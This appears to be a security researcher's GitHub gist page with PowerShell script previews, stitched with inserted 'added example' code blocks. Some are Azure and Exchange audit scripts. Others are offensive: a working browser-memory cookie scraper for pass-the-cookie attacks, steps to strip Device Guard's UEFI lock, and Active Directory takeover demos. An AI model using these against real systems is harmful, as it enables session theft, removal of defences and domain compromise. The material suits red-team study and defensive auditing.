LuemmelSec

@LuemmelSec
LuemmelSec / Get-AppsWithFull_acces_as_appRole.ps1
Last active February 16, 2024 04:16
Check for Apps that can read all user mailboxes and have no restricting access policy
# PowerShell script to check which apps hold the "full_access_as_app" EWS application role and can therefore read every mailbox in the tenant
# ApplicationAccessPolicies may be in place that restrict such an app to certain mailboxes, which reduces the criticality
# This is reflected in the output as well.
# Written for PowerShell 7 - to run it under PowerShell 5 you need to swap some modules and calls
# Check if ExchangeOnlineManagement module is available
$ExchangeOnlineModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
# Check if Az.Accounts module is available
$AzAccountsModule = Get-Module -Name Az.Accounts -ListAvailable
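The check the script above performs, written out as an added example (this is not the gist's code): every client app that was granted the Exchange Online `full_access_as_app` app role, cross-referenced with `Get-ApplicationAccessPolicy` so that apps already scoped by a policy are separated from the ones that can reach every mailbox. It assumes the Microsoft.Graph and ExchangeOnlineManagement modules, a Graph session with `Application.Read.All`, and Exchange admin rights for the policy cmdlet.

```powershell
# Added example, not the gist's code: list every client app holding the Exchange Online
# application permission full_access_as_app and whether an ApplicationAccessPolicy scopes it.
# Assumes the Microsoft.Graph and ExchangeOnlineManagement modules, Graph rights to read
# applications (Application.Read.All) and Exchange admin rights for Get-ApplicationAccessPolicy.
Connect-MgGraph -Scopes 'Application.Read.All' | Out-Null
Connect-ExchangeOnline -ShowBanner:$false

# The Exchange Online resource service principal has the same appId in every tenant.
$ExoSp = Get-MgServicePrincipal -Filter "appId eq '00000002-0000-0ff1-ce00-000000000000'"
if (-not $ExoSp) { throw 'Exchange Online service principal not found' }

# Look the app role up by its value rather than hard-coding its id.
$Role = $ExoSp.AppRoles | Where-Object { $_.Value -eq 'full_access_as_app' }
if (-not $Role) { throw 'full_access_as_app app role not present on the Exchange Online service principal' }

# Assignments *to* the Exchange SP: one per client service principal that was granted a role.
$Assigned = Get-MgServicePrincipalAppRoleAssignedTo -ServicePrincipalId $ExoSp.Id -All |
    Where-Object { $_.AppRoleId -eq $Role.Id -and $_.PrincipalType -eq 'ServicePrincipal' }

# Policies are keyed by the client appId. RestrictAccess narrows the app to a scope, DenyAccess blocks it.
$Policies = Get-ApplicationAccessPolicy

$Assigned | ForEach-Object {
    $Client = Get-MgServicePrincipal -ServicePrincipalId $_.PrincipalId
    $Scoped = @($Policies | Where-Object { $_.AppId -eq $Client.AppId })
    if ($Scoped.Count -gt 0) {
        $Risk = 'reduced: ' + (($Scoped | ForEach-Object { "$($_.AccessRight) $($_.ScopeIdentity)" }) -join '; ')
    } else {
        $Risk = 'HIGH: no policy, can access every mailbox'
    }
    [pscustomobject]@{
        App        = $Client.DisplayName
        AppId      = $Client.AppId
        HasPolicy  = ($Scoped.Count -gt 0)
        Assessment = $Risk
    }
} | Sort-Object HasPolicy | Format-Table -AutoSize -Wrap
```

Two caveats when reading the output: `full_access_as_app` only covers EWS, so apps holding the Graph application permission `Mail.ReadWrite` have the same reach and need a separate check; and a policy only helps if its scope is right, which `Test-ApplicationAccessPolicy -Identity <mailbox> -AppId <appId>` confirms for one app/mailbox pair.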
LuemmelSec / cvemap_wrapper.ps1
Last active February 4, 2024 08:52
cvemap wrapper
# Run cvemap with our desired flags and output to json
# I needed to run this with cvemap version 0.0.2 as 0.0.3 broke the ability to pipe to a file for whatever reason
.\cvemap.exe -severity=critical -severity=high -es '> 0.01' -poc=true -l 1000 -json > new_vulns.json
# Paths to the JSON files
$newJsonFilePath = "new_vulns.json"
$databaseJsonFilePath = "cve_database.json"
# Read the newly fetched JSON file
$newJsonContent = Get-Content -Path $newJsonFilePath | ConvertFrom-Json
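The step the wrapper leads up to, as an added example rather than the gist's own code: diff the fresh export against the stored database by CVE id, print what is new, and merge it in so the next run only reports changes. The field names `cve_id`, `severity` and `cvss_score` are assumptions about cvemap's JSON schema.

```powershell
# Added example, not the gist's code: compare the fresh cvemap export with the stored database,
# report entries not seen before and persist the union. Field names (cve_id, severity,
# cvss_score) are assumptions about cvemap's JSON output; adjust to what your version emits.
$newJsonFilePath      = 'new_vulns.json'
$databaseJsonFilePath = 'cve_database.json'

$new = @(Get-Content -Path $newJsonFilePath -Raw | ConvertFrom-Json)

# First run: no database yet, so every entry is new.
$known = if (Test-Path $databaseJsonFilePath) {
    @(Get-Content -Path $databaseJsonFilePath -Raw | ConvertFrom-Json)
} else {
    @()
}

# A HashSet gives O(1) membership tests; Where-Object against $known would be O(n*m).
$knownIds = [System.Collections.Generic.HashSet[string]]::new()
foreach ($k in $known) { [void]$knownIds.Add($k.cve_id) }

$added = @($new | Where-Object { -not $knownIds.Contains($_.cve_id) })

if ($added.Count -eq 0) {
    Write-Host 'No new CVEs since the last run.'
} else {
    Write-Host "$($added.Count) new CVE(s) matching the cvemap filters:"
    $added | Select-Object cve_id, severity, cvss_score | Format-Table -AutoSize
    # Persist the union so the next run only reports what changed.
    ($known + $added) | ConvertTo-Json -Depth 10 | Set-Content -Path $databaseJsonFilePath -Encoding utf8
}
```

Keying on the CVE id means a record whose EPSS or PoC status changed since the last run is not reported as new; if that matters, compare the serialized record instead of the id.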
LuemmelSec / Process_String_Extractor.ps1
Created May 9, 2023 07:48
A wrapper for strings2.exe to extract sensitive info out of processes
# This scriptlet relies on https://github.com/glmcdona/strings2
# Import the script: PS> import-module .\Process_String_Extractor.ps1
# Run the function: PS> ScrapeProcessMemory -Strings2Path "D:\Tools\Strings2.exe" -Processname notepad -SearchString "Hello World"
# To extract cookies for an O365 / Azure pass-the-cookie (PTC) attack: PS> ScrapeProcessMemory -Strings2Path "D:\Tools\Strings2.exe" -Processname chrome -SearchString "ESTSAUTH","SignInStateCookie"
function ScrapeProcessMemory {
    Param(
        [Parameter(Mandatory)]
        [string]$Processname,
        [Parameter(Mandatory)]
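An independently written wrapper of the same kind, added here as an example and not the gist's function: it runs strings2 against every process with the given name (a browser is many processes, so scanning only the first PID misses most of the memory), matches the search terms literally, and surfaces access errors instead of silently returning nothing. It assumes strings2 accepts `-pid <pid>` as its README shows; the function and parameter names are this example's own.

```powershell
# Added example, not the gist's code: wrapper around strings2.exe
# (https://github.com/glmcdona/strings2) that dumps printable strings from every process
# with a given name and returns the lines containing any of the search terms.
# Assumes strings2 accepts "-pid <pid>" as documented in its README.
function Get-ProcessStrings {
    [CmdletBinding()]
    Param(
        [Parameter(Mandatory)] [string]   $Strings2Path,
        [Parameter(Mandatory)] [string]   $ProcessName,
        [Parameter(Mandatory)] [string[]] $SearchString
    )

    if (-not (Test-Path -LiteralPath $Strings2Path)) {
        throw "strings2 not found at $Strings2Path"
    }

    # One browser "process" is really many; scan each PID, not just the first.
    $procs = Get-Process -Name $ProcessName -ErrorAction SilentlyContinue
    if (-not $procs) {
        Write-Warning "No running process named '$ProcessName'"
        return
    }

    # Escape the search terms so they match literally, then OR them together.
    $pattern = ($SearchString | ForEach-Object { [regex]::Escape($_) }) -join '|'

    foreach ($p in $procs) {
        # Reading another process's memory needs at least the same integrity level
        # (and SeDebugPrivilege for processes owned by other users). strings2 reports
        # access failures on stderr; 2>&1 merges them so they can be shown as warnings.
        $out = & $Strings2Path -pid $p.Id 2>&1
        foreach ($line in $out) {
            if ($line -is [System.Management.Automation.ErrorRecord]) {
                Write-Warning "PID $($p.Id): $line"
                continue
            }
            if ($line -match $pattern) {
                [pscustomobject]@{ ProcessName = $p.ProcessName; PID = $p.Id; Match = $line }
            }
        }
    }
}

# Usage (the cookie names are the ones the gist's own note above mentions):
# PS> Get-ProcessStrings -Strings2Path 'D:\Tools\strings2.exe' -ProcessName chrome -SearchString 'ESTSAUTH','SignInStateCookie'
```

From the defensive side, the same observation applies in reverse: session cookies sit in plaintext in the browser's memory, so a non-elevated user-mode process running as the same user can read them, and Conditional Access policies that are only evaluated at sign-in will not notice the replayed session.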
LuemmelSec / Azure_App_Consent_check.ps1
Created March 24, 2023 09:07
A simple PowerShell script to check to which apps the user consented to and which permissions were granted
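One way to produce that report, as an added example rather than the gist's script: read the user's own OAuth2 permission grants, add the tenant-wide admin consents that also apply to that user, and resolve each grant to the client app, the resource and the scopes it carries. It assumes the Microsoft.Graph module and `Directory.Read.All`; the UPN is a placeholder.

```powershell
# Added example, not the gist's code: list the apps a user consented to, the delegated
# permissions each grant carries, and separately the tenant-wide admin consents that also
# apply to that user. Assumes the Microsoft.Graph module and Directory.Read.All.
Connect-MgGraph -Scopes 'Directory.Read.All' | Out-Null

$Upn  = 'alice@contoso.example'      # placeholder, replace with the account to audit
$User = Get-MgUser -UserId $Upn

# Grants where this user is the principal (ConsentType = Principal).
$UserGrants  = @(Get-MgUserOauth2PermissionGrant -UserId $User.Id -All)
# Grants an admin made for all users; these are not visible on the user object itself.
$AdminGrants = @(Get-MgOauth2PermissionGrant -Filter "consentType eq 'AllPrincipals'" -All)

# Service principal lookups repeat across grants, so cache them.
$SpCache = @{}
function Get-Sp([string]$Id) {
    if (-not $SpCache.ContainsKey($Id)) { $SpCache[$Id] = Get-MgServicePrincipal -ServicePrincipalId $Id }
    $SpCache[$Id]
}

function Resolve-Grant($Grant, [string]$Source) {
    $client   = Get-Sp $Grant.ClientId
    $resource = Get-Sp $Grant.ResourceId
    $scopes   = @($Grant.Scope.Trim() -split '\s+' | Where-Object { $_ })
    [pscustomobject]@{
        Consent    = $Source
        App        = $client.DisplayName
        AppId      = $client.AppId
        Publisher  = $client.PublisherName
        Resource   = $resource.DisplayName
        Scopes     = $scopes -join ' '
        # Write, Send and offline_access (refresh tokens) are what illicit-consent phishing is after.
        HighImpact = [bool]($scopes | Where-Object { $_ -match 'Write|Send|offline_access' })
    }
}

$Report  = @($UserGrants  | ForEach-Object { Resolve-Grant $_ 'User' })
$Report += @($AdminGrants | ForEach-Object { Resolve-Grant $_ 'Admin (all users)' })
$Report | Sort-Object HighImpact -Descending | Format-Table -AutoSize -Wrap
```

Apps with an empty `Publisher` (unverified publisher) that hold `offline_access` plus a `Mail.*` or `Files.*` write scope are the rows to look at first; revoking is a `Remove-MgOauth2PermissionGrant -OAuth2PermissionGrantId <id>` on the grant, not on the app.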
LuemmelSec / GBC.ps1
Created December 9, 2022 07:43
Give Back Control over Windows functions script
$elevated = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
function Show-Menu {
    Clear-Host
    Write-Host "======================================================"
    Write-Host "================= Give Back Control =================="
    Write-Host "======================================================"
    if($elevated -eq $true){
        Write-Host "Local Admin: " -ForegroundColor white -NoNewline; Write-Host $elevated -ForegroundColor Green
        Write-Host "We have superpowers. Ready to continue."
LuemmelSec / disabledevicegard.ps1
Created December 1, 2022 08:51
Disable DeviceGuard with UEFI lock
# Steps needed to disable DeviceGuard with UEFI lock
# Disable DeviceGuard in registry
cmd /c 'REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f'
cmd /c 'REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f'
cmd /c 'REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f'
cmd /c 'REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f'
# Change UEFI settings. Reboot and confirmation needed.
mountvol X: /s
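The part of the procedure the preview cuts off, as an added example rather than the gist's code: the sequence Microsoft documents for the Device Guard / Credential Guard opt-out tool (SecConfig.efi), which is what actually clears the UEFI lock. The GUID is the identifier Microsoft's documentation uses for the DebugTool BCD entry, and X: is the drive letter the gist itself uses for the EFI system partition.

```powershell
# Added example, not the gist's code: the opt-out sequence Microsoft documents for removing the
# Device Guard / Credential Guard UEFI lock with the SecConfig.efi boot application. With the
# UEFI lock set, deleting the registry values (the gist's first step) changes nothing until this
# boot-time step has run and been confirmed at the console.
# The GUID is the DebugTool BCD entry identifier used in Microsoft's documentation.
$IsAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
if (-not $IsAdmin) { throw 'Run elevated: mountvol /s and bcdedit need administrator rights' }

$Guid     = '{0cb3b571-2f2e-4343-a879-d86a476d7215}'
$EfiDrive = 'X:'

# Record the current policy so the before/after state is on file.
Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard' -ErrorAction SilentlyContinue |
    Select-Object EnableVirtualizationBasedSecurity, RequirePlatformSecurityFeatures

# 1. Mount the EFI system partition and copy the opt-out tool onto it.
mountvol $EfiDrive /s
Copy-Item "$env:WINDIR\System32\SecConfig.efi" "$EfiDrive\EFI\Microsoft\Boot\SecConfig.efi" -Force

# 2. Create a one-shot boot entry that runs SecConfig.efi before the Windows loader.
bcdedit /create $Guid /d "DebugTool" /application osloader
bcdedit /set $Guid path "\EFI\Microsoft\Boot\SecConfig.efi"
bcdedit /set '{bootmgr}' bootsequence $Guid
# DISABLE-LSA-ISO clears Credential Guard, DISABLE-VBS clears the VBS lock as well.
bcdedit /set $Guid loadoptions DISABLE-LSA-ISO,DISABLE-VBS
bcdedit /set $Guid device partition=$EfiDrive

# 3. Unmount. The next reboot shows SecConfig.efi's prompt, which must be accepted at the
#    console: the physical-presence requirement is exactly what the UEFI lock buys you, and
#    why this step cannot be completed over a remote session.
mountvol $EfiDrive /d
```

For detection, the footprint is distinctive: a new `osloader` BCD entry whose path is `\EFI\Microsoft\Boot\SecConfig.efi`, a write to the EFI system partition, and deletion of the DeviceGuard policy values, all from an elevated context shortly before a reboot.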
LuemmelSec / rbcd_demo.ps1
Created June 12, 2022 07:22 — forked from S3cur3Th1sSh1t/rbcd_demo.ps1
Resource-based constrained delegation computer DACL takeover demo
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
LuemmelSec / Workstation-Takeover.md
Created June 12, 2022 07:22 — forked from S3cur3Th1sSh1t/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
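A defender's check for the two preconditions the overview names, added here as an example (it is not part of the original write-up): a domain-wide sweep for computer objects that already have `msDS-AllowedToActOnBehalfOfOtherIdentity` populated, decoded into the accounts allowed to delegate to them, and a look at the local WebClient service, which the relay depends on. It uses only the ActiveDirectory RSAT module.

```powershell
# Added example, not part of the original write-up: audit the preconditions of the attack.
# Part 1 finds computer objects with a populated msDS-AllowedToActOnBehalfOfOtherIdentity and
# shows who may delegate to them; part 2 reports the local WebClient service state.
Import-Module ActiveDirectory

function Get-RbcdDelegations {
    # The attribute is empty on every computer by default, so the LDAP filter keeps the result
    # set small. PrincipalsAllowedToDelegateToAccount is the AD module's decoded view of it.
    Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
                   -Properties PrincipalsAllowedToDelegateToAccount, OperatingSystem, whenChanged |
        ForEach-Object {
            [pscustomobject]@{
                Target        = $_.Name
                OS            = $_.OperatingSystem
                AllowedFrom   = ($_.PrincipalsAllowedToDelegateToAccount -join '; ')
                LastChanged   = $_.whenChanged
                # Legitimate RBCD lives on servers; a client OS delegating to another
                # computer account is the footprint of the takeover described above.
                IsWorkstation = ($_.OperatingSystem -like 'Windows 1*' -or $_.OperatingSystem -like 'Windows 7*')
            }
        }
}

function Get-WebClientState {
    # WebClient is trigger-started: StartType shows Manual, Status shows whether something
    # (a SharePoint/WebDAV interaction, or a remote coercion) has already started it.
    $svc = Get-Service -Name WebClient -ErrorAction SilentlyContinue
    if (-not $svc) {
        return [pscustomobject]@{ Present = $false; Status = 'n/a'; StartType = 'n/a' }
    }
    [pscustomobject]@{ Present = $true; Status = $svc.Status; StartType = $svc.StartType }
}

Get-RbcdDelegations | Sort-Object IsWorkstation -Descending | Format-Table -AutoSize -Wrap
Get-WebClientState
```

A workstation row in the first table whose `AllowedFrom` is a computer account created recently (compare with `Get-ADComputer -Filter * -Properties whenCreated`) deserves immediate attention; disabling or removing the WebClient service where WebDAV is not needed removes the HTTP authentication path the relay requires.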

LuemmelSec / certifried_with_krbrelayup.md
Created June 12, 2022 07:21 — forked from S3cur3Th1sSh1t/certifried_with_krbrelayup.md
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from a non-privileged user, with the requirement of adding a computer account or owning an existing one. Kerberos relay targeting LDAP combined with Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) that machine. Combining the two: a non-privileged domain user escalates to Domain Admin without the requirement of adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites: